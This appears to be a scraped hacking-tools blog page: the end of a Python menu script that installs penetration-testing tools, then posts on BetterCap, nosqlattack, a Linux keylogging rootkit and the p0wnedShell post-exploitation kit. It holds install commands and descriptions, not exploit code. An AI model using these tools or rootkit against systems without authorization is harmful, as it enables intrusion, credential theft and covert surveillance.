        info()
    elif choice == 2:
        passwd()
    elif choice == 3:
        wire()
    elif choice == 4:
        exp()
    elif choice == 5:
        snif()
    elif choice == 99:
        os.system('clear'),sys.exit();
#end of function
##########################
#nmap function 
def nmap():
    print("this step will download and install nmap ")
    print("yes or no ")
    choice7 = raw_input()
    if choice7 in yes :
        os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2")
        os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -")
        # every os.system() call runs in its own shell, so the cd has to be
        # chained with the commands that depend on it; the script already
        # checks that it runs as root (see root()), so no su is needed
        os.system("cd nmap-7.01 && ./configure && make && make install")
    elif choice7 in no :
        info()
####################################
#jboss-autopwn
def jboss():
    os.system('clear')
    print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
    print ("deployed, the script uses its upload and command execution capability to")
    print ("provide an interactive session.")
    print ("")
    print (" this will install jboss-autopwn") 
    print ("usage : ./e.sh target_ip tcp_port ")
    choice9 = raw_input("yes / no :")
    if choice9 in yes:
        os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git"),sys.exit();
    elif choice9 in no:
        os.system('clear'); exp()
#sqlmap 
def sqlmap():
    print (" this will install sqlmap ")
    print ("usage : python sqlmap.py -h")
    # raw_input() returns the typed string; input() would try to evaluate "yes" as Python
    choice8 = raw_input("yes or no :")
    if choice8 in yes:
        os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev")
    elif choice8 in no:
        os.system('clear'); info()

#setoolkit 
def setoolkit():
    print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
    print ("designed for social engineering. SET has a number of custom attack vectors that")
    print ("allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC")
    print ("an information security consulting firm located in Cleveland, Ohio.")
    print ("")
    choiceset = raw_input("y / n :")
    if choiceset in yes:
        # chain the cd with setup.py: each os.system() call gets its own shell
        os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git && cd social-engineer-toolkit && python setup.py")
    elif choiceset in no:
        os.system("clear"); info()
#cupp 
def cupp():
    print("cupp is a password list generator ")
    print("Usage: python cupp.py -h")
    print("yes or no")
    choicecupp = raw_input("y / n :")
    if choicecupp in yes:
        os.system("git clone https://github.com/Mebus/cupp.git")
    elif choicecupp in no:
        os.system("clear"); passwd()
#ncrack 
def ncrack():
    print("A Ruby interface to Ncrack, Network authentication cracking tool.")
    print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
    print("y to accept / n to decline")
    choicencrack = raw_input("y / n :")
    if choicencrack in yes:
        # os.systemgem() does not exist; run gem install inside the cloned directory
        os.system("git clone https://github.com/sophsec/ruby-ncrack.git && cd ruby-ncrack && gem install ruby-ncrack")
    elif choicencrack in no:
        os.system("clear"); passwd()
#reaver
def reaver():
    print("Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup")
    print("WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a")
    print("wide variety of access points and WPS implementations")
    print("y to accept / n to decline")
    # raw_input() returns the typed string; input() would try to evaluate "y" as Python
    creaver = raw_input("y / n :")
    if creaver in yes:
        os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
        # the cd has to be chained: each os.system() call runs in its own shell
        os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git && cd reaver-wps-fork-t6x/src && ./configure && make")
    elif creaver in no:
        os.system("clear"); wire()

#####################################
#information gathering function
def info():
    print("1 : nmap ")
    print("3 : SET tool kit")
    print("99 :Go Back To Main Menu")
    choice2 = int(raw_input("select a number :"))
    if choice2 == 1:
        os.system('clear'); nmap()
    elif choice2 == 3:
        os.system("clear"); setoolkit()
    elif choice2 == 99:
        os.system("clear"); menu()
#end of menu 
##########################
#password attacks menu 
def passwd():
    print("1 : cupp ")
    print("2 : Ncrack")
    print("99:Back To Main Menu")
    choice3 = int(raw_input("select a number :"))
    if choice3 == 1:
        os.system("clear"); cupp()
    elif choice3 == 2:
        os.system("clear"); ncrack()
    elif choice3 == 99:
        os.system("clear"); menu()
#end of menu 
##########################
#wireless attacks
def wire():
    print("1 : reaver ")
    print("99: Go Back To The Main Menu")
    choice4 = int(raw_input("select a number :"))
    if choice4 == 1:
        os.system("clear"); reaver()
    elif choice4 == 99:
        menu()
##########################
#exploitation tools
def exp():
    print("1 : jboss-autopwn ")
    print("2 : sqlmap")
    print("99 : Go Back To Main Menu")
    choice5 = int(raw_input("select a number :"))
    if choice5 == 1:
        os.system('clear'); jboss()
    elif choice5 == 2:
        os.system("clear"); sqlmap()
    elif choice5 == 99:
        menu()
###########################
#sniffing tools
def snif():
    print("1 : Set Tool kit ")
    print("99: Back To Main Menu")
    choice6 = int(raw_input("select a number :"))
    if choice6 == 1:
        os.system("clear"); setoolkit()
    elif choice6 == 99:
        os.system("clear"); menu()
#end of menu 
##########################
  #Check use OS
def OS():
    print(
    """
    Choose Operating System : 
    1) Mac OSX
    2) Linux
    3) Windows
    """)
    # compare strings: raw_input() returns a string, so "2" never equals 2
    system = raw_input(":").strip()
    if system == "2":
        root()  # exits unless we are running as root
    menu()

############################
#check root if linux 
def root():
    if os.getuid() != 0:
        print("Are you root? Please execute as root")
        exit() 
#############################
#begin :D 
OS()

Source: https://github.com/x3omdax

BetterCap v1.1.10 – A complete, modular, portable and easily extensible MITM framework.


Changelog v1.1.10:
New Features
+ Implemented –silent option to suppress Logger messages.
+ Implemented –no-target-nbns option to disable targets NBNS hostname resolution.
+ Implemented –custom-parser REGEX option to use a custom regular expression for the sniffer.
+ Option -T|–target now supports both ip and mac addresses.
+ Using StreamLogger for both Proxy and Sniffer traffic. Better sniffer logging.

Fixes:
+ Fixed a bug which caused the logger to raise an exception when -h|–help option is passed.
+ Give some time to the discovery thread to spawn its workers, this prevents Too many open files errors to delay host discovery.
+ Fixed a bug which caused exceptions not to be printed.
+ Suppress log messages as soon as CTRL+C is pressed.

Code Style:
+ Removed deprecated tests folder.
+ Wrapped every class with module BetterCap and refactored old code structure.
+ Various refactoring with if/unless boolean conditions.


bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.
DEPENDS:
All dependencies will be automatically installed through the GEM system; in some cases you might need to install a system dependency in order to make everything work:
sudo apt-get install ruby-dev libpcap-dev

HOW TO INSTALL:
Stable Release ( GEM ):
gem install bettercap

From Source:

Ubuntu/Debian/Kali:
sudo apt-get install ruby-dev libpcap-dev

Fedora/Centos/redhat
yum install ruby-dev libpcap-dev

git clone https://github.com/evilsocket/bettercap
cd bettercap
gem build bettercap.gemspec
sudo gem install bettercap*.gem

Download : v1.1.10.tar.gz  | v1.1.10.zip
Source : http://www.bettercap.org/ | Our Post Before

nosqlattack – Automate some attacks against NoSQL-backed web applications.


nosqlattack is an application that tries to automate some of the work of testing for injection attacks in JS and NoSQL web applications. Some of the functionality is targeted directly at the database, but most of it is targeted at web forms, where it tries to inject JS or alter the database query.


Application Overview:
The application is written in Rust with modularity in mind. There are two main functions:
+ Authentication attacks against the DB
+ Injection attacks against a web application

Authentication attacks:
Some high-level traits are defined. Each specific DB-attack implementation must implement these traits. Currently, only MongoDB and CouchDB are defined.

Injection attacks:
All attacks are defined in an .ini file, so new attacks can be created without re-compiling the application. The .ini file is parsed to create 1 or more attacks out of each defined attack. See more details in data/inject.ini.
The functionality of the parser is a bit limited, but it can still create some decent injection attacks.

TODO:
+ Analyze web form so we don’t have to type that manually.
+ Specify exploit code .ini file so we can display an example of exploit code for manual verification.
+ Implement blind NoSQL injection for dumping the entire DB.
See “ServerSide JavaScript Injection: Attacking NoSQL and Node.js” by Bryan Sullivan
+ Inject in header fields as well
+ Add vulnerable example application

Usage, Dependency and installation:

Windows 32 bit
https://static.rust-lang.org/dist/rust-1.0.0-i686-pc-windows-gnu.msi
https://static.rust-lang.org/cargo-dist/cargo-nightly-i686-pc-windows-gnu.tar.gz
windows 64 bit
https://static.rust-lang.org/dist/rust-1.0.0-x86_64-pc-windows-gnu.msi
https://static.rust-lang.org/cargo-dist/cargo-nightly-x86_64-pc-windows-gnu.tar.gz

after dependency install
git clone https://github.com/rstenvi/nosqlattack
cd nosqlattack
cargo build
cargo run (or ./target/debug/nosqlattack)

All Linux:
curl -sSf https://static.rust-lang.org/rustup.sh | sh
git clone https://github.com/rstenvi/nosqlattack
cd nosqlattack
cargo build
cargo run
or ./target/debug/nosqlattack

Source : https://github.com/rstenvi

Linux Rootkit with magic sending package.


NOTICE : This POST for Research Purpose Only!

Introduction:
In the following we want to explore how to make a Linux kernel rootkit. As the definition of a rootkit states, it should run as root and should be hard for users to detect. To give the rootkit real value it has to do something. We decided to go with two very common use cases when it comes to
Implementation:
This section deals with keylogging in the Linux kernel. Keylogging describes the process of intercepting all input keys from a keyboard. Our rootkit intercepts all keys and sends them to a server. It is possible to activate and deactivate the keylogging function. To implement a keylogger in the Linux kernel you must register a keyboard notifier.


Rootkit client Menu:
usage: ./rootkit_client.py [-a key] [-d key] [-h <host>] [-u]
-a key sends a magic package to the rootkit and activates the keylogger and listens
-d key sends a magic package to the rootkit and deactivates the keylogger
-a hide sends a magic package to the rootkit and activates modul hiding
-d hide sends a magic package to the rootkit and deactivates modul hiding
-a root sends a magic package to the rootkit and activate the root shell
-h <host> the ip for the host where the rootkit is running

Usage:

git clone https://github.com/soad003/rootkit
cd rootkit
make
insmod rootkt.ko (load the module on the server)
rmmod rootkt.ko (unload the module on the server)

Client:
./rootkit_client.py

Source : https://github.com/soad003

p0wnedShell v1.2 – PowerShell Runspace Post Exploitation Toolkit.


p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an "all in one" Post Exploitation tool which we could use to bypass all mitigation solutions (or at least some of them), and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.


what’s new in 2016:
+ Added MS15-051 Kernel Exploit

What’s inside the runspace:
The following PowerShell tools/functions are included:
+ PowerSploit Invoke-Shellcode
+ PowerSploit Invoke-ReflectivePEInjection
+ PowerSploit Invoke-Mimikatz
+ PowerSploit Invoke-TokenManipulation
+ Veil’s PowerTools PowerUp
+ Veil’s PowerTools PowerView
+ HarmJ0y’s Invoke-Psexec
+ Besimorhino’s PowerCat
+ Nishang Invoke-PsUACme
+ Nishang Invoke-Encode
+ Nishang Get-PassHashes
+ Nishang Invoke-CredentialsPhish
+ Nishang Port-Scan
+ Nishang Copy-VSS
PowerShell functions within the runspace are loaded in memory from Base64-encoded strings.

The following Binaries/tools are included:
+ Benjamin DELPY’s Mimikatz
+ Benjamin DELPY’s MS14-068 kekeo Exploit
+ Didier Stevens modification of ReactOS Command Prompt
+ hfiref0x MS15-051 Local SYSTEM Exploit
Binaries are loaded in memory using ReflectivePEInjection (Byte arrays are compressed using Gzip and saved within p0wnedShell as Base64 encoded strings).

How to build:

Download *.zip and unzip it
Open Visual Studio Community
Right click p0wnedShell and open it with your Visual Studio version
Build p0wnedShell

Download: p0wnedShell-master.zip(1.6 MB)
Source : https://github.com/Cn33liz
